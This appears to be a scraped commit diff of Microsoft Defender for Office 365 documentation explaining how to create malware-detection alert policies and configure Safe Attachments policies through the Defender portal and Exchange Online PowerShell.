- - **Description**: Type an optional description. For example, **Notifies admins when malicious files are detected in SharePoint Online, OneDrive, or Microsoft Teams**.
- - **Severity**: Select **Low**, **Medium**, or **High** from the dropdown list.
- - **Category**: Select **Threat management** from the dropdown list.
-
- When you're finished on the **Name your alert, categorize it, and choose a severity** page, select **Next**.
-
-4. On the **Choose an activity, conditions and when to trigger the alert** page, configure the following settings:
- - **What do you want to alert on?** section \> **Activity is** \> **Common user activities** section \> Select **Detected malware in file** from the dropdown list.
- - **How do you want the alert to be triggered?** section: Select **Every time an activity matches the rule**.
-
- When you're finished on the **Choose an activity, conditions and when to trigger the alert** page, select **Next**.
-
-5. On the **Decide if you want to notify people when this alert is triggered** page, configure the following settings:
- - Verify **Opt-in for email notifications** is selected. In the **Email recipients** box, select one or more global administrators, security administrators, or security readers who should receive notification when a malicious file is detected.
- - **Daily notification limit**: Leave the default value **No limit** selected.
-
- When you're finished on the **Decide if you want to notify people when this alert is triggered** page, select **Next**.
-
-6. On the **Review your settings** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- In the **Do you want to turn the policy on right away?** section, select **Yes, turn it on right away**.
-
- When you're finished n the **Review your settings** page, select **Submit**.
-
-7. On this page, you can review the alert policy in read-only mode.
-
- When you're finished, select **Done**.
-
- Back on the **Alert policy** page, the new policy is listed.
-
-### Use Security & Compliance PowerShell to create an alert policy for detected files
-
-If you'd rather use PowerShell to create the same alert policy as described in the previous section, [connect to Security & Compliance PowerShell](/powershell/exchange/connect-to-scc-powershell) and run the following command:
-
-```powershell
-New-ActivityAlert -Name "Malicious Files in Libraries" -Description "Notifies admins when malicious files are detected in SharePoint Online, OneDrive, or Microsoft Teams" -Category ThreatManagement -Operation FileMalwareDetected -NotifyUser "admin1@contoso.com","admin2@contoso.com"
-```
-
-**Note**: The default _Severity_ value is Low. To specify Medium or High, include the _Severity_ parameter and value in the command.
-
-For detailed syntax and parameter information, see [New-ActivityAlert](/powershell/module/exchange/new-activityalert).
-
-### How do you know these procedures worked?
--- To verify that you've successfully turned on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams, use either of the following steps:-
- - In the Microsoft Defender portal, go to **Policies & rules** \> **Threat Policies** \> **Policies** section \> **Safe Attachments**, select **Global settings**, and verify the value of the **Turn on Defender for Office 365 for SharePoint, OneDrive, and Microsoft Teams** setting.
-
- - In Exchange Online PowerShell, run the following command to verify the property setting:
-
- ```powershell
- Get-AtpPolicyForO365 | Format-List EnableATPForSPOTeamsODB
- ```
-
- For detailed syntax and parameter information, see [Get-AtpPolicyForO365](/powershell/module/exchange/get-atppolicyforo365).
--- To verify that you've successfully blocked people from downloading malicious files, open SharePoint Online PowerShell, and run the following command to verify the property value:-
- ```powershell
- Get-SPOTenant | Format-List DisallowInfectedFileDownload
- ```
-
- For detailed syntax and parameter information, see [Get-SPOTenant](/powershell/module/sharepoint-online/Set-SPOTenant).
--- To verify that you've successfully configured an alert policy for detected files, use either of the following methods:
- - In the Microsoft Defender portal at <https://security.microsoft.com/alertpolicies>, select the alert policy, and verify the settings.
- - In Security & Compliance PowerShell, replace \<AlertPolicyName\> with the name of the alert policy, run the following command, and verify the property values:
-
- ```powershell
- Get-ActivityAlert -Identity "<AlertPolicyName>"
- ```
-
- For detailed syntax and parameter information, see [Get-ActivityAlert](/powershell/module/exchange/get-activityalert).
--- Use the [Threat protection status report](reports-email-security.md#threat-protection-status-report) to view information about detected files in SharePoint, OneDrive, and Microsoft Teams. Specifically, you can use the **View data by: Content \> Malware** view.
security Safe Attachments Policies Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/safe-attachments-policies-configure.md
- Title: Set up Safe Attachments policies in Microsoft Defender for Office 365
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier2
-description: Learn about how to define Safe Attachments policies to protect your organization from malicious files in email.
-- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Set up Safe Attachments policies in Microsoft Defender for Office 365
--
-> [!IMPORTANT]
-> This article is intended for business customers who have [Microsoft Defender for Office 365](defender-for-office-365-whats-new.md). If you're a home user looking for information about attachment scanning in Outlook, see [Advanced Outlook.com security](https://support.microsoft.com/office/882d2243-eab9-4545-a58a-b36fee4a46e2).
-
-In organizations with Microsoft Defender for Office 365, Safe Attachments is an additional layer of protection against malware in messages. After message attachments are scanned by [anti-malware protection in Exchange Online Protection (EOP)](anti-malware-protection-about.md), Safe Attachments opens files in a virtual environment to see what happens (a process known as _detonation_) before the messages are delivered to recipients. For more information, see [Safe Attachments in Microsoft Defender for Office 365](safe-attachments-about.md).
-
-Although there's no default Safe Attachments policy, the **Built-in protection** preset security policy provides Safe Attachments protection to all recipients by default. Recipients who are specified in the Standard or Strict preset security policies or in custom Safe Attachments policies aren't affected. For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).
-
-For greater granularity, you can also use the procedures in this article to create Safe Attachments policies that apply to specific users, group, or domains.
-
-You configure Safe Attachments policies in the Microsoft Defender portal or in Exchange Online PowerShell.
-
-> [!NOTE]
-> In the global settings of Safe Attachments settings, you configure features that aren't dependent on Safe Attachments policies. For instructions see [Turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-configure.md) and [Safe Documents in Microsoft 365 E5](safe-documents-in-e5-plus-security-about.md).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Safe Attachments** page, use <https://security.microsoft.com/safeattachmentv2>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md) and [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Create, modify, and delete policies_: Membership in the **Organization Management** or **Security Administrator** role groups in Email & collaboration RBAC <u>and</u> membership in the **Organization Management** role group in Exchange Online RBAC.
- - _Read-only access to policies_: Membership in one of the following role groups:
- - **Global Reader** or **Security Reader** in Email & collaboration RBAC.
- - **View-Only Organization Management** in Exchange Online RBAC.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- For our recommended settings for Safe Attachments policies, see [Safe Attachments settings](recommended-settings-for-eop-and-office365.md#safe-attachments-settings).-
- > [!TIP]
- > [Exceptions to Built-in protection for Safe Attachments](preset-security-policies.md#use-the-microsoft-defender-portal-to-add-exclusions-to-the-built-in-protection-preset-security-policy) or settings in custom Safe Attachments policies are ignored if a recipient is also included in the [Standard or Strict preset security policies](preset-security-policies.md). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
--- Allow up to 30 minutes for a new or updated policy to be applied.--- For more information about licensing requirements, see [Licensing terms](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description#licensing-terms).-
-## Use the Microsoft Defender portal to create Safe Attachments policies
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Safe Attachments** in the **Policies** section.Or, to go directly to the **Safe Attachments** page, use <https://security.microsoft.com/safeattachmentv2>.
-
-2. On the **Safe Attachments** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** to start the new Safe Attachments policy wizard.
-
-3. On the **Name your policy** page, configure these settings:
- - **Name**: Enter a unique, descriptive name for the policy.
- - **Description**: Enter an optional description for the policy.
-
- When you're finished on the **Name your policy** page, select **Next**.
-
-4. On the **Users and domains** page, identify the internal recipients that the policy applies to (recipient conditions):
- - **Users**: The specified mailboxes, mail users, or mail contacts.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: All recipients in the organization with a primary email address in the specified [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
-
- Click in the appropriate box, start typing a value, and select the value that you want from the results. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png"::: next to the value.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users, enter an asterisk (\*) by itself to see all available values.
-
- You can use a condition only once, but the condition can contain multiple values:
-
- - Multiple **values** of the **same condition** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy is applied to them.
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- - **Exclude these users, groups, and domains**: To add exceptions for the internal recipients that the policy applies to (recipient exceptions), select this option and configure the exceptions.
-
- You can use an exception only once, but the exception can contain multiple values:
-
- - Multiple **values** of the **same exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy isn't applied to them.
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
- When you're finished on the **Users and domains** page, select **Next**.
-
-5. On the **Settings** page, configure the following settings:
-
- - **Safe Attachments unknown malware response**: Select one of the following values:
- - **Off**
- - **Monitor**
- - **Block**: This is the default value, and the recommended value in Standard and Strict [preset security policies](preset-security-policies.md).
- - **Dynamic Delivery (Preview messages)**
-
- These values are explained in [Safe Attachments policy settings](safe-attachments-about.md#safe-attachments-policy-settings).
-
- - **Quarantine policy**: Select the quarantine policy that applies to messages that are quarantined by Safe Attachments (**Block** or **Dynamic Delivery**). Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
- By default, the quarantine policy named AdminOnlyAccessPolicy is used for malware detections by Safe Attachments policies. For more information about this quarantine policy, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
- > [!NOTE]
- > Quarantine notifications are disabled in the policy named AdminOnlyAccessPolicy. To notify recipients that have messages quarantined as malware by Safe Attachments, create or use an existing quarantine policy where quarantine notifications are turned on. For instructions, see [Create quarantine policies in the Microsoft Defender portal](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
- >
- > Users can't release their own messages that were quarantined as malware by Safe Attachments policies, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware messages.
-
- - **Redirect messages with detected attachments**: If you select **Enable redirect**, you can specify an email address in the **Send messages that contain monitored attachments to the specified email address** box to send messages that contain malware attachments for analysis and investigation.
-
- > [!NOTE]
- > Redirection is available only for the **Monitor** action. For more information, see [MC424899](https://admin.microsoft.com/AdminPortal/Home?#/MessageCenter/:/messages/MC424899).
-
- When you're finished on the **Settings** page, select **Next**.
-
-6. On the **Review** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review** page, select **Submit**.
-
-7. On the **New Safe Attachments policy created** page, you can select the links to view the policy, view Safe Attachments policies, and learn more about Safe Attachments policies.
-
- When you're finished on the **New Safe Attachments policy created** page, select **Done**.
-
- Back on the **Safe Attachments** page, the new policy is listed.
-
-## Use the Microsoft Defender portal to view Safe Attachments policy details
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Safe Attachments** in the **Policies** section. To go directly to the **Safe Attachments** page, use <https://security.microsoft.com/safeattachmentv2>.
-
-On the **Safe Attachments** page, the following properties are displayed in the list of policies:
--- **Name**-- **Status**: Values are **On** or **Off**.-- **Priority**: For more information, see the [Set the priority of Safe Attachments policies](#use-the-microsoft-defender-portal-to-set-the-priority-of-custom-safe-attachments-policies) section.-
-To change the list of policies from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific Safe Attachment policies.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of policies to a CSV file.
-
-Use :::image type="icon" source="../../medi#threat-protection-status-report).
-
-Select a policy by clicking anywhere in the row other than the check box next to the name to open the details flyout for the policy.
-
-> [!TIP]
-> To see details about other Safe Attachments policies without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Use the Microsoft Defender portal to take action on Safe Attachments policies
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Safe Attachments** in the **Policies** section. To go directly to the **Safe Attachments** page, use <https://security.microsoft.com/safeattachmentv2>.
-
-2. On the **Safe Attachments** page, select the Safe Attachments policy by using either of the following methods:
-
- - Select the policy from the list by selecting the check box next to the name. The following actions are available in the :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** dropdown list that appears:
- - **Enable selected policies**.
- - **Disable selected policies**.
- - **Delete selected policies**.
-
- :::image type="content" source="../../media/safe-attachments-policies-main-page.png" alt-text="The Safe Attachments page with a policy selected and the More actions control expanded." lightbox="../../media/safe-attachments-policies-main-page.png":::
-
- - Select the policy from the list by clicking anywhere in the row other than the check box next to the name. Some or all following actions are available in the details flyout that opens:
- - Modify policy settings by clicking **Edit** in each section (custom policies or the default policy)
- - :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** or :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** (custom policies only)
- - :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** or :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** (custom policies only)
- - :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** (custom policies only)
-
- :::image type="content" source="../../media/anti-phishing-policies-details-flyout.png" alt-text="The details flyout of a custom Safe Attachments policy." lightbox="../../media/anti-phishing-policies-details-flyout.png":::
-
-The actions are described in the following subsections.
-
-### Use the Microsoft Defender portal to modify custom Safe Attachments policies
-
-After you select a custom Safe Attachments policy by clicking anywhere in the row other than the check box next to the name, the policy settings are shown in the details flyout that opens. Select **Edit** in each section to modify the settings within the section. For more information about the settings, see the [Create Safe Attachments policies](#use-the-microsoft-defender-portal-to-create-safe-attachments-policies) section earlier in this article.
-
-You can't modify the Safe Attachments policies named **Standard Preset Security Policy**, **Strict Preset Security Policy**, or **Built-in protection (Microsoft)** that are associated with [preset security policies](preset-security-policies.md) in the policy details flyout. Instead, you select :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **View preset security policies** in the details flyout to go to the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies> to modify the preset security policies.
-
-### Use the Microsoft Defender portal to enable or disable custom Safe Attachments policies
-
-You can't enable or disable the Safe Attachments policies named **Standard Preset Security Policy**, **Strict Preset Security Policy**, or **Built-in protection (Microsoft)** that are associated with [preset security policies](preset-security-policies.md) here. You enable or disable preset security policies on the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies>.
-
-After you select an enabled custom Safe Attachments policy (the **Status** value is **On**), use either of the following methods to disable it:
--- **On the Safe Attachments page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Disable selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** at the top of the flyout.-
-After you select a disabled custom Safe Attachments policy (the **Status** value is **Off**), use either of the following methods to enable it:
--- **On the Safe Attachments page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Enable selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** at the top of the flyout.-
-On the **Safe Attachments** page, the **Status** value of the policy is now **On** or **Off**.
-
-### Use the Microsoft Defender portal to set the priority of custom Safe Attachments policies
-
-Safe Attachments policies are processed in the order that they're displayed on the **Safe Attachments** page:
--- The Safe Attachments policy named **Strict Preset Security Policy** that's associated with the Strict preset security policy is always applied first (if the Strict preset security policy is [enabled](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users)).-- The Safe Attachments policy named **Standard Preset Security Policy** that's associated with the Standard preset security policy is always applied next (if the Standard preset security policy is enabled).-- Custom Safe Attachments policies are applied next in priority order (if they're enabled):
- - A lower priority value indicates a higher priority (0 is the highest).
- - By default, a new policy is created with a priority that's lower than the lowest existing custom policy (the first is 0, the next is 1, etc.).
- - No two policies can have the same priority value.
-- The Safe Attachments policy named **Built-in protection (Microsoft)** that's associated with Built-in protection always has the priority value **Lowest**, and you can't change it.-
-Safe Attachments protection stops for a recipient after the first policy is applied (the highest priority policy for that recipient). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-After you select the custom Safe Attachments policy by clicking anywhere in the row other than the check box next to the name, you can increase or decrease the priority of the policy in the details flyout that opens:
--- The custom policy with the **Priority** value **0** on the **Safe Attachments** page has the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** action at the top of the details flyout.-- The custom policy with the lowest priority (highest **Priority** value; for example, **3**) has the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** action at the top of the details flyout.-- If you have three or more policies, the policies between **Priority** 0 and the lowest priority have both the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** and the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** actions at the top of the details flyout.-
-When you're finished in the policy details flyout, select **Close**.
-
-Back on the **Safe Attachments** page, the order of the policy in the list matches the updated **Priority** value.
-
-### Use the Microsoft Defender portal to remove custom Safe Attachments policies
-
-You can't remove the Safe Attachments policies named **Standard Preset Security Policy**, **Strict Preset Security Policy**, or **Built-in protection (Microsoft)** that are associated with [preset security policies](preset-security-policies.md).
-
-After you select the custom Safe Attachments policy, use either of the following methods to remove it:
--- **On the Safe Attachments page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Delete selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** at the top of the flyout.-
-Select **Yes** in the warning dialog that opens.
-
-Back on the **Safe Attachments** page, the removed policy is no longer listed.
-
-## Use Exchange Online PowerShell to configure Safe Attachments policies
-
-In PowerShell, the basic elements of a Safe Attachments policy are:
--- **The safe attachment policy**: Specifies the actions for unknown malware detections, whether to send messages with malware attachments to a specified email address, and whether to deliver messages if Safe Attachments scanning can't complete.-- **The safe attachment rule**: Specifies the priority and recipient filters (who the policy applies to).-
-The difference between these two elements isn't obvious when you manage Safe Attachments policies in the Microsoft Defender portal:
--- When you create a Safe Attachments policy in the Defender portal, you're actually creating a safe attachment rule and the associated safe attachment policy at the same time using the same name for both.-- When you modify a Safe Attachments policy in the Defender portal, settings related to the name, priority, enabled or disabled, and recipient filters modify the safe attachment rule. All other settings modify the associated safe attachment policy.-- When you remove a Safe Attachments policy from the Defender portal, the safe attachment rule and the associated safe attachment policy are removed.-
-In PowerShell, the difference between safe attachment policies and safe attachment rules is apparent. You manage safe attachment policies by using the **\*-SafeAttachmentPolicy** cmdlets, and you manage safe attachment rules by using the **\*-SafeAttachmentRule** cmdlets.
--- In PowerShell, you create the safe attachment policy first, then you create the safe attachment rule, which identifies the associated policy that the rule applies to.-- In PowerShell, you modify the settings in the safe attachment policy and the safe attachment rule separately.-- When you remove a safe attachment policy from PowerShell, the corresponding safe attachment rule isn't automatically removed, and vice versa.-
-### Use PowerShell to create Safe Attachments policies
-
-Creating a Safe Attachments policy in PowerShell is a two-step process:
-
-1. Create the safe attachment policy.
-2. Create the safe attachment rule that specifies the safe attachment policy that the rule applies to.
-
- **Notes**:
--- You can create a new safe attachment rule and assign an existing, unassociated safe attachment policy to it. A safe attachment rule can't be associated with more than one safe attachment policy.--- You can configure the following settings on new safe attachment policies in PowerShell that aren't available in the Microsoft Defender portal until after you create the policy:
- - Create the new policy as disabled (_Enabled_ `$false` on the **New-SafeAttachmentRule** cmdlet).
- - Set the priority of the policy during creation (_Priority_ _\<Number\>_) on the **New-SafeAttachmentRule** cmdlet).
--- A new safe attachment policy that you create in PowerShell isn't visible in the Microsoft Defender portal until you assign the policy to a safe attachment rule.-
-#### Step 1: Use PowerShell to create a safe attachment policy
-
-To create a safe attachment policy, use this syntax:
-
-```PowerShell
-New-SafeAttachmentPolicy -Name "<PolicyName>" -Enable $true [-AdminDisplayName "<Comments>"] [-Action <Allow | Block | DynamicDelivery>] [-Redirect <$true | $false>] [-RedirectAddress <SMTPEmailAddress>] [-QuarantineTag <QuarantinePolicyName>]
-```
-
-This example creates a safe attachment policy named Contoso All with the following values:
--- Block messages that are found to contain malware by Safe Documents scanning (we aren't using the _Action_ parameter, and the default value is `Block`).-- The default quarantine policy is used (AdminOnlyAccessPolicy), because we aren't using the _QuarantineTag_ parameter.-
-```PowerShell
-New-SafeAttachmentPolicy -Name "Contoso All" -Enable $true
-```
-
-For detailed syntax and parameter information, see [New-SafeAttachmentPolicy](/powershell/module/exchange/new-safeattachmentpolicy).
-
-> [!TIP]
-> For detailed instructions to specify the quarantine policy to use in a safe attachment policy, see [Use PowerShell to specify the quarantine policy in Safe Attachments policies](quarantine-policies.md#safe-attachments-policies-in-powershell).
-
-#### Step 2: Use PowerShell to create a safe attachment rule
-
-To create a safe attachment rule, use this syntax:
-
-```PowerShell
-New-SafeAttachmentRule -Name "<RuleName>" -SafeAttachmentPolicy "<PolicyName>" <Recipient filters> [<Recipient filter exceptions>] [-Comments "<OptionalComments>"] [-Enabled <$true | $false>]
-```
-
-This example creates a safe attachment rule named Contoso All with the following conditions:
--- The rule is associated with the safe attachment policy named Contoso All.-- The rule applies to all recipients in the contoso.com domain.-- Because we aren't using the _Priority_ parameter, the default priority is used.-- The rule is enabled (we aren't using the _Enabled_ parameter, and the default value is `$true`).-
-```powershell
-New-SafeAttachmentRule -Name "Contoso All" -SafeAttachmentPolicy "Contoso All" -RecipientDomainIs contoso.com
-```
-
-For detailed syntax and parameter information, see [New-SafeAttachmentRule](/powershell/module/exchange/new-safeattachmentrule).
-
-### Use PowerShell to view safe attachment policies
-
-To view existing safe attachment policies, use the following syntax:
-
-```PowerShell
-Get-SafeAttachmentPolicy [-Identity "<PolicyIdentity>"] [| <Format-Table | Format-List> <Property1,Property2,...>]
-```
-
-This example returns a summary list of all safe attachment policies.
-
-```PowerShell
-Get-SafeAttachmentPolicy
-```
-
-This example returns detailed information for the safe attachment policy named Contoso Executives.
-
-```PowerShell
-Get-SafeAttachmentPolicy -Identity "Contoso Executives" | Format-List
-```
-
-For detailed syntax and parameter information, see [Get-SafeAttachmentPolicy](/powershell/module/exchange/get-safeattachmentpolicy).
-
-### Use PowerShell to view safe attachment rules
-
-To view existing safe attachment rules, use the following syntax:
-
-```PowerShell
-Get-SafeAttachmentRule [-Identity "<RuleIdentity>"] [-State <Enabled | Disabled>] [| <Format-Table | Format-List> <Property1,Property2,...>]
-```
-
-This example returns a summary list of all safe attachment rules.
-
-```PowerShell
-Get-SafeAttachmentRule
-```
-
-To filter the list by enabled or disabled rules, run the following commands:
-
-```PowerShell
-Get-SafeAttachmentRule -State Disabled
-```
-
-```PowerShell
-Get-SafeAttachmentRule -State Enabled
-```
-
-This example returns detailed information for the safe attachment rule named Contoso Executives.
-
-```PowerShell
-Get-SafeAttachmentRule -Identity "Contoso Executives" | Format-List
-```
-
-For detailed syntax and parameter information, see [Get-SafeAttachmentRule](/powershell/module/exchange/get-safeattachmentrule).
-
-### Use PowerShell to modify safe attachment policies
-
-You can't rename a safe attachment policy in PowerShell (the **Set-SafeAttachmentPolicy** cmdlet has no _Name_ parameter). When you rename a Safe Attachments policy in the Microsoft Defender portal, you're only renaming the safe attachment _rule_.
-
-Otherwise, the same settings are available when you create a safe attachment policy as described in the [Step 1: Use PowerShell to create a safe attachment policy](#step-1-use-powershell-to-create-a-safe-attachment-policy) section earlier in this article.
-
-To modify a safe attachment policy, use this syntax:
-
-```PowerShell
-Set-SafeAttachmentPolicy -Identity "<PolicyName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-SafeAttachmentPolicy](/powershell/module/exchange/set-safeattachmentpolicy).
-
-> [!TIP]
-> For detailed instructions to specify the quarantine policy to use in a safe attachment policy, see [Use PowerShell to specify the quarantine policy in Safe Attachments policies](quarantine-policies.md#safe-attachments-policies-in-powershell).
-
-### Use PowerShell to modify safe attachment rules
-
-The only setting that's not available when you modify a safe attachment rule in PowerShell is the _Enabled_ parameter that allows you to create a disabled rule. To enable or disable existing safe attachment rules, see the next section.
-
-Otherwise, the same settings are available when you create a rule as described in the [Step 2: Use PowerShell to create a safe attachment rule](#step-2-use-powershell-to-create-a-safe-attachment-rule) section earlier in this article.
-
-To modify a safe attachment rule, use this syntax:
-
-```PowerShell
-Set-SafeAttachmentRule -Identity "<RuleName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-SafeAttachmentRule](/powershell/module/exchange/set-safeattachmentrule).
-
-### Use PowerShell to enable or disable safe attachment rules
-
-Enabling or disabling a safe attachment rule in PowerShell enables or disables the whole Safe Attachments policy (the safe attachment rule and the assigned safe attachment policy).
-
-To enable or disable a safe attachment rule in PowerShell, use this syntax:
-
-```PowerShell
-<Enable-SafeAttachmentRule | Disable-SafeAttachmentRule> -Identity "<RuleName>"
-```
-
-This example disables the safe attachment rule named Marketing Department.
-
-```PowerShell
-Disable-SafeAttachmentRule -Identity "Marketing Department"
-```
-
-This example enables same rule.
-
-```PowerShell
-Enable-SafeAttachmentRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Enable-SafeAttachmentRule](/powershell/module/exchange/enable-safeattachmentrule) and [Disable-SafeAttachmentRule](/powershell/module/exchange/disable-safeattachmentrule).
-
-### Use PowerShell to set the priority of safe attachment rules
-
-The highest priority value you can set on a rule is 0. The lowest value you can set depends on the number of rules. For example, if you have five rules, you can use the priority values 0 through 4. Changing the priority of an existing rule can have a cascading effect on other rules. For example, if you have five custom rules (priorities 0 through 4), and you change the priority of a rule to 2, the existing rule with priority 2 is changed to priority 3, and the rule with priority 3 is changed to priority 4.
-
-To set the priority of a safe attachment rule in PowerShell, use the following syntax:
-
-```PowerShell
-Set-SafeAttachmentRule -Identity "<RuleName>" -Priority <Number>
-```
-
-This example sets the priority of the rule named Marketing Department to 2. All existing rules that have a priority less than or equal to 2 are decreased by 1 (their priority numbers are increased by 1).
-
-```PowerShell
-Set-SafeAttachmentRule -Identity "Marketing Department" -Priority 2
-```
-
-**Note**: To set the priority of a new rule when you create it, use the _Priority_ parameter on the **New-SafeAttachmentRule** cmdlet instead.
-
-For detailed syntax and parameter information, see [Set-SafeAttachmentRule](/powershell/module/exchange/set-safeattachmentrule).
-
-### Use PowerShell to remove safe attachment policies
-
-When you use PowerShell to remove a safe attachment policy, the corresponding safe attachment rule isn't removed.
-
-To remove a safe attachment policy in PowerShell, use this syntax:
-
-```PowerShell
-Remove-SafeAttachmentPolicy -Identity "<PolicyName>"
-```
-
-This example removes the safe attachment policy named Marketing Department.
-
-```PowerShell
-Remove-SafeAttachmentPolicy -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-SafeAttachmentPolicy](/powershell/module/exchange/remove-safeattachmentpolicy).
-
-### Use PowerShell to remove safe attachment rules
-
-When you use PowerShell to remove a safe attachment rule, the corresponding safe attachment policy isn't removed.
-
-To remove a safe attachment rule in PowerShell, use this syntax:
-
-```PowerShell
-Remove-SafeAttachmentRule -Identity "<PolicyName>"
-```
-
-This example removes the safe attachment rule named Marketing Department.
-
-```PowerShell
-Remove-SafeAttachmentRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-SafeAttachmentRule](/powershell/module/exchange/remove-safeattachmentrule).
-
-## How do you know these procedures worked?
-
-To verify that you've successfully created, modified, or removed Safe Attachments policies, do any of the following steps:
--- On the **Safe Attachments** page in the Microsoft Defender portal at <https://security.microsoft.com/safeattachmentv2>, verify the list of policies, their **Status** values, and their **Priority** values. To view more details, select the policy from the list by clicking on the name, and view the details in the fly out.--- In Exchange Online PowerShell, replace \<Name\> with the name of the policy or rule, run the following command, and verify the settings:-
